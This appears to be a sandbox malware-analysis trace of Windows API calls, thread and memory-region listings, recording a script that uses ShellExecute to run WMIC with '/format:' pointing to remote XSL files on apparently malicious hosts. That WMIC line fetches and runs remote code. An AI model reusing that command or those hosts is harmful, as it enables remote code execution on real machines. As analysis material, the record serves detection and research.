[0058.383] WshShell:IUnknown:QueryInterface (in: This=0x298c94, riid=0x6d2a5608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x12f2a4 | out: ppvObject=0x12f2a4*=0x0) returned 0x80004002
[0058.383] WshShell:IUnknown:QueryInterface (in: This=0x298c94, riid=0x6d2a5764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x12f2a0 | out: ppvObject=0x12f2a0*=0x0) returned 0x80004002
[0058.383] WshShell:IUnknown:QueryInterface (in: This=0x298c94, riid=0x6d2a5710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12f29c | out: ppvObject=0x12f29c*=0x28984c) returned 0x0
[0058.383] WshShell:IUnknown:Release (This=0x298c94) returned 0x1
[0058.383] CLSIDFromProgID (in: lpszProgID="Shell.Application", lpclsid=0x12f314 | out: lpclsid=0x12f314*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
[0058.384] SysStringLen (param_1=0x0) returned 0x0
[0058.384] IInternetHostSecurityManager:ProcessUrlAction (in: This=0x5e7ef0, dwAction=0x1200, pPolicy=0x12f2c4, cbPolicy=0x4, pContext=0x12f314*=0x20, cbContext=0x10, dwFlags=0x0, dwReserved=0x0 | out: pPolicy=0x12f2c4*=0x0) returned 0x0
[0058.384] CoGetClassObject (in: rclsid=0x12f314*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x5, pvReserved=0x0, riid=0x6d2a087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12f308 | out: ppv=0x12f308*=0x289894) returned 0x0
[0058.385] WshShell:IUnknown:QueryInterface (in: This=0x289894, riid=0x6d2a7884*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x12f304 | out: ppvObject=0x12f304*=0x0) returned 0x80004002
[0058.385] WshShell:IClassFactory:CreateInstance (in: This=0x289894, pUnkOuter=0x0, riid=0x6d2a0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12f30c | out: ppvObject=0x12f30c*=0x298e74) returned 0x0
[0058.386] WshShell:IUnknown:Release (This=0x289894) returned 0x0
[0058.386] IInternetHostSecurityManager:QueryCustomPolicy (in: This=0x5e7ef0, guidKey=0x6d2bb6fc, ppPolicy=0x12f290, pcbPolicy=0x12f288, pContext=0x12f29c*=0x20, cbContext=0x18, dwReserved=0x0 | out: ppPolicy=0x12f290, pcbPolicy=0x12f288*=0x4) returned 0x0
[0058.386] CoTaskMemFree (pv=0x250de0)
[0058.386] WshShell:IUnknown:QueryInterface (in: This=0x298e74, riid=0x6d2a5a50*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x12f2c0 | out: ppvObject=0x12f2c0*=0x289924) returned 0x0
[0058.387] WshShell:IObjectWithSite:SetSite (This=0x289924, pUnkSite=0x18f2a8) returned 0x0
[0058.387] WshShell:IUnknown:QueryInterface (in: This=0x18f2a8, riid=0x76a63e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12ed7c | out: ppvObject=0x12ed7c*=0x0) returned 0x80004002
[0058.387] WshShell:IUnknown:QueryInterface (in: This=0x18f2a8, riid=0x76a63e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12ed3c | out: ppvObject=0x12ed3c*=0x0) returned 0x80004002
[0058.388] WshShell:IUnknown:QueryInterface (in: This=0x18f2a8, riid=0x76a597c4*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12ed24 | out: ppvObject=0x12ed24*=0x0) returned 0x80004002
[0058.388] WshShell:IUnknown:QueryInterface (in: This=0x18f2a8, riid=0x76a69b0c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12ecd8 | out: ppvObject=0x12ecd8*=0x18f2a8) returned 0x0
[0058.388] WshShell:IUnknown:AddRef (This=0x18f2a8) returned 0x3
[0058.388] WshShell:IUnknown:QueryInterface (in: This=0x18f2a8, riid=0x76a4c15c*(Data1=0x18, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12ec38 | out: ppvObject=0x12ec38*=0x0) returned 0x80004002
[0058.388] WshShell:IUnknown:QueryInterface (in: This=0x18f2a8, riid=0x76a4c0a8*(Data1=0x19, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2988ec | out: ppvObject=0x2988ec*=0x0) returned 0x80004002
[0058.388] WshShell:IUnknown:QueryInterface (in: This=0x18f2a8, riid=0x76a4c16c*(Data1=0x4c1e39e1, Data2=0xe3e3, Data3=0x4296, Data4=([0]=0xaa, [1]=0x86, [2]=0xec, [3]=0x93, [4]=0x8d, [5]=0x89, [6]=0x6e, [7]=0x92)), ppvObject=0x12ec40 | out: ppvObject=0x12ec40*=0x0) returned 0x80004002
[0058.388] WshShell:IUnknown:Release (This=0x18f2a8) returned 0x2
[0058.399] WshShell:IUnknown:Release (This=0x289924) returned 0x1
[0058.399] WshShell:IUnknown:QueryInterface (in: This=0x298e74, riid=0x6d2a5700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x12f2ac | out: ppvObject=0x12f2ac*=0x0) returned 0x80004002
[0058.399] WshShell:IUnknown:QueryInterface (in: This=0x298e74, riid=0x6d2a55f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x12f2a8 | out: ppvObject=0x12f2a8*=0x0) returned 0x80004002
[0058.399] WshShell:IUnknown:QueryInterface (in: This=0x298e74, riid=0x6d2a5608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x12f2a4 | out: ppvObject=0x12f2a4*=0x0) returned 0x80004002
[0058.399] WshShell:IUnknown:QueryInterface (in: This=0x298e74, riid=0x6d2a5764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x12f2a0 | out: ppvObject=0x12f2a0*=0x0) returned 0x80004002
[0058.400] WshShell:IUnknown:QueryInterface (in: This=0x298e74, riid=0x6d2a5710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12f29c | out: ppvObject=0x12f29c*=0x2899fc) returned 0x0
[0058.400] WshShell:IUnknown:Release (This=0x298e74) returned 0x1
[0058.405] WshShell:IDispatch:GetIDsOfNames (in: This=0x2899fc, riid=0x6d2a0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x12f3cc*="ShellExecute", cNames=0x1, lcid=0x409, rgDispId=0x12f3f0 | out: rgDispId=0x12f3f0*=1610809345) returned 0x0
[0058.421] WshShell:IUnknown:AddRef (This=0x2899fc) returned 0x2
[0058.421] WshShell:IDispatch:Invoke (in: This=0x2899fc, dispIdMember=1610809345, riid=0x6d2a0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x12f394*(rgvarg=([0]=0x12f338*(varType=0x3, wReserved1=0x12, wReserved2=0x9088, wReserved3=0x17e, varVal1=0x0, varVal2=0x0), [1]=0x12f348*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="open", varVal2=0x17d2f28), [2]=0x12f358*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x17d2f28), [3]=0x12f368*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=" os get XBRSEWYL, freephysicalmemory /format:\"http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641\"", varVal2=0x0), [4]=0x12f378*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\WMIC.exe", varVal2=0x17d2f28)), rgdispidNamedArgs=0x0, cArgs=0x5, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x12f3a8, puArgErr=0x12f3a4 | out: pDispParams=0x12f394*(rgvarg=([0]=0x12f338*(varType=0x3, wReserved1=0x12, wReserved2=0x9088, wReserved3=0x17e, varVal1=0x0, varVal2=0x0), [1]=0x12f348*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="open", varVal2=0x17d2f28), [2]=0x12f358*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x17d2f28), [3]=0x12f368*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=" os get XBRSEWYL, freephysicalmemory /format:\"http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641\"", varVal2=0x0), [4]=0x12f378*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\WMIC.exe", varVal2=0x17d2f28)), rgdispidNamedArgs=0x0, cArgs=0x5, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x12f3a8*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x12f3a4*=0x0) returned 0x0
[0058.472] WshShell:IUnknown:Release (This=0x2899fc) returned 0x1
[0058.472] GetCurrentThreadId () returned 0x9a8
[0058.472] IActiveScriptSite:OnEnterScript (This=0x5e7eb0) returned 0x0
[0058.472] ISystemDebugEventFire:IsActive (This=0x289458) returned 0x1
[0058.472] JScriptEngine5:IUnknown:Release (This=0x5e7eb0) returned 0x3
[0058.472] GetCurrentThreadId () returned 0x9a8
[0058.472] IActiveScriptSite:OnStateChange (This=0x5e7eb0, ssScriptState=2) returned 0x0
[0058.472] JScriptEngine5:IActiveScript:GetScriptDispatch (in: This=0x17d4870, pstrItemName=0x0, ppdisp=0x12f840 | out: ppdisp=0x12f840*=0x17e8260) returned 0x0
[0058.472] GetCurrentThreadId () returned 0x9a8
[0058.472] JScriptEngine5:IUnknown:QueryInterface (in: This=0x17e8260, riid=0x6d375624*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x12f7e4 | out: ppvObject=0x12f7e4*=0x17e8260) returned 0x0
[0058.473] JScriptEngine5:IUnknown:AddRef (This=0x17e8260) returned 0x4
[0058.473] JScriptEngine5:IUnknown:Release (This=0x17d4db8) returned 0x1
[0058.473] JScriptEngine5:IUnknown:Release (This=0x17e8260) returned 0x1
[0058.473] JScriptEngine5:IUnknown:Release (This=0x17e8260) returned 0x1
[0058.473] JScriptEngine5:IActiveScript:SetScriptState (This=0x17d4870, ss=0) returned 0x0
[0058.473] GetCurrentThreadId () returned 0x9a8
[0058.473] GetCurrentThreadId () returned 0x9a8
[0058.473] IUnknown:Release (This=0x289458) returned 0x1
[0058.474] IActiveScriptSite:OnStateChange (This=0x5e7eb0, ssScriptState=3) returned 0x0
[0058.474] IActiveScriptSite:OnStateChange (This=0x5e7eb0, ssScriptState=5) returned 0x0
[0058.474] GetUserDefaultLCID () returned 0x409
[0058.474] GetACP () returned 0x4e4
[0058.475] ISystemDebugEventFire:EndSession (This=0x289458) returned 0x0
[0058.475] IUnknown:Release (This=0x289458) returned 0x0
[0058.475] IUnknown:Release (This=0x5e7ef0) returned 0x1
[0058.475] JScriptEngine5:IUnknown:Release (This=0x5e7ec4) returned 0x2
[0058.475] IActiveScriptSite:OnStateChange (This=0x5e7eb0, ssScriptState=0) returned 0x0
[0058.475] JScriptEngine5:IUnknown:Release (This=0x5e7eb0) returned 0x1
[0058.475] IXSLProcessor:get_output (in: This=0x5ea728, pOutput=0x12f9b8 | out: pOutput=0x12f9b8*(varType=0x8, wReserved1=0x6d36, wReserved2=0xf7e9, wReserved3=0x6409, varVal1=" os get Kqncmv426, lgiet286a, UUFIKrncm, numberofusers /format:\"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh\" CRH2YWU7root\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTSTDOUTN/AON0x80041017Invalid query\r\nWMI", varVal2=0x5e9bc8)) returned 0x0
[0058.475] XSLTemplate:IUnknown:Release (This=0x5ea728) returned 0x0
[0058.475] FreeThreadedDOMDocument:IUnknown:Release (This=0x5e8af0) returned 0x2
[0058.475] XSLTemplate:IUnknown:Release (This=0x5e8848) returned 0x0
[0058.475] JScriptEngine5:IActiveScript:Close (This=0x17d4870) returned 0x0
[0058.475] JScriptEngine5:IUnknown:Release (This=0x17d4870) returned 0x2
[0058.475] JScriptEngine5:IUnknown:Release (This=0x17d4874) returned 0x1
[0058.475] JScriptEngine5:IUnknown:Release (This=0x17e8260) returned 0x1
[0058.487] StdGlobalInterfaceTable:IGlobalInterfaceTable:RevokeInterfaceFromGlobal (This=0x76b66460, dwCookie=0x201) returned 0x0
[0058.487] StdGlobalInterfaceTable:IUnknown:Release (This=0x18f8c0) returned 0x1
[0058.487] ??1CHString@@QAE@XZ () returned 0x6f900504
[0058.487] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" os get Kqncmv426, lgiet286a, UUFIKrncm, numberofusers /format:\"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh\" CRH2YWU7root\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTSTDOUTN/AON0x80041017Invalid query\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 247
[0058.487] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" os get Kqncmv426, lgiet286a, UUFIKrncm, numberofusers /format:\"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh\" CRH2YWU7root\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTSTDOUTN/AON0x80041017Invalid query\r\n", cchWideChar=-1, lpMultiByteStr=0x17e92a8, cbMultiByte=247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" os get Kqncmv426, lgiet286a, UUFIKrncm, numberofusers /format:\"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh\" CRH2YWU7root\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTSTDOUTN/AON0x80041017Invalid query\r\n", lpUsedDefaultChar=0x0) returned 247
[0058.487] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 246
[0058.487] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0058.487] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="W", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2
[0058.487] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="W", cchWideChar=-1, lpMultiByteStr=0x17d4a78, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="W", lpUsedDefaultChar=0x0) returned 2
[0058.487] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 1
[0058.488] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0058.488] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="M", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2
[0058.488] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="M", cchWideChar=-1, lpMultiByteStr=0x17d4a78, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="M", lpUsedDefaultChar=0x0) returned 2
[0058.488] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 1
[0058.488] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0058.488] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="I", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2
[0058.488] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="I", cchWideChar=-1, lpMultiByteStr=0x17d4a78, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="I", lpUsedDefaultChar=0x0) returned 2
[0058.488] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 1
[0058.489] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0058.489] LoadStringW (in: hInstance=0x0, uID=0xafd2, lpBuffer=0x17e90b0, cchBufferMax=1024 | out: lpBuffer="\r\n") returned 0x2
[0058.489] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3
[0058.489] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x17d4a78, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3
[0058.489] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 2
[0058.489] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0058.489] ??1CHString@@QAE@XZ () returned 0x6f900504
[0058.489] ??1CHString@@QAE@XZ () returned 0x1
[0058.489] FreeThreadedDOMDocument:IUnknown:Release (This=0x5e9bc8) returned 0x0
[0058.489] ?Empty@CHString@@QAEXXZ () returned 0x6f900504
[0058.489] ?Empty@CHString@@QAEXXZ () returned 0x6f900504
[0058.489] WbemObjectTextSrc:IUnknown:Release (This=0x224afd8) returned 0x0
[0058.507] IUnknown:Release (This=0x224b808) returned 0x0
[0058.507] WbemLocator:IUnknown:Release (This=0x630828) returned 0x2
[0058.507] WbemLocator:IUnknown:Release (This=0x63c7cc) returned 0x0
[0058.508] WbemLocator:IUnknown:Release (This=0x63c74c) returned 0x0
[0058.509] WbemLocator:IUnknown:Release (This=0x630828) returned 0x1
[0058.509] ?Empty@CHString@@QAEXXZ () returned 0x6f900504
[0058.509] WbemLocator:IUnknown:Release (This=0x630828) returned 0x0
[0058.509] exit (_Code=-2147217385)
[0058.509] ??1CHString@@QAE@XZ () returned 0x6f900504
[0058.509] ??1CHString@@QAE@XZ () returned 0x6f900504
Thread:
id = 3
os_tid = 0x9bc
Thread:
id = 4
os_tid = 0xa40
Thread:
id = 5
os_tid = 0xa44
Thread:
id = 6
os_tid = 0xa48
Thread:
id = 7
os_tid = 0xa4c
Thread:
id = 8
os_tid = 0xa50
Thread:
id = 58
os_tid = 0xa7c
Thread:
id = 59
os_tid = 0xa80
Thread:
id = 60
os_tid = 0xa84
Thread:
id = 76
os_tid = 0xa90
Thread:
id = 77
os_tid = 0xa94
Thread:
id = 79
os_tid = 0xaa0
[0058.485] WshShell:IUnknown:Release (This=0x18f2a8) returned 0x0
Thread:
id = 80
os_tid = 0xaa4
Process:
id = "3"
image_name = "svchost.exe"
filename = "c:\\windows\\system32\\svchost.exe"
page_root = "0x7f1be1a0"
os_pid = "0x338"
os_integrity_level = "0x4000"
os_privileges = "0xe60b1e890"
monitor_reason = "rpc_server"
parent_id = "2"
os_parent_pid = "0x9a4"
cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\SYSTEM"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ac6a" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]
Region:
id = 296
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 297
start_va = 0x20000
end_va = 0x26fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 298
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 299
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 300
start_va = 0x50000
end_va = 0x51fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 301
start_va = 0x60000
end_va = 0x60fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000060000"
filename = ""
Region:
id = 302
start_va = 0x70000
end_va = 0xaffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000070000"
filename = ""
Region:
id = 303
start_va = 0xb0000
end_va = 0x116fff
entry_point = 0xb0000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 304
start_va = 0x120000
end_va = 0x120fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000120000"
filename = ""
Region:
id = 305
start_va = 0x130000
end_va = 0x130fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000130000"
filename = ""
Region:
id = 306
start_va = 0x140000
end_va = 0x140fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000140000"
filename = ""
Region:
id = 307
start_va = 0x150000
end_va = 0x150fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 308
start_va = 0x160000
end_va = 0x16ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 309
start_va = 0x170000
end_va = 0x170fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000170000"
filename = ""
Region:
id = 310
start_va = 0x180000
end_va = 0x181fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000180000"
filename = ""
Region:
id = 311
start_va = 0x190000
end_va = 0x28ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000190000"
filename = ""
Region:
id = 312
start_va = 0x290000
end_va = 0x30ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000290000"
filename = ""
Region:
id = 313
start_va = 0x310000
end_va = 0x313fff
entry_point = 0x310000
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 314
start_va = 0x320000
end_va = 0x321fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000320000"
filename = ""
Region:
id = 315
start_va = 0x330000
end_va = 0x33ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000330000"
filename = ""
Region:
id = 316
start_va = 0x340000
end_va = 0x343fff
entry_point = 0x340000
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 317
start_va = 0x350000
end_va = 0x38ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000350000"
filename = ""
Region:
id = 318
start_va = 0x390000
end_va = 0x39ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000390000"
filename = ""
Region:
id = 319
start_va = 0x3a0000
end_va = 0x3a0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003a0000"
filename = ""
Region:
id = 320
start_va = 0x3b0000
end_va = 0x3b7fff
entry_point = 0x3b0000
region_type = mapped_file
name = "svchost.exe"
filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")
Region:
id = 321
start_va = 0x3c0000
end_va = 0x487fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003c0000"
filename = ""
Region:
id = 322
start_va = 0x490000
end_va = 0x590fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000490000"
filename = ""
Region:
id = 323
start_va = 0x5a0000
end_va = 0x992fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005a0000"
filename = ""
Region:
id = 324
start_va = 0x9a0000
end_va = 0x9dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000009a0000"
filename = ""
Region:
id = 325
start_va = 0x9e0000
end_va = 0xa1ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000009e0000"
filename = ""
Region:
id = 326
start_va = 0xa20000
end_va = 0xa20fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a20000"
filename = ""
Region:
id = 327
start_va = 0xa30000
end_va = 0xa6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000a30000"
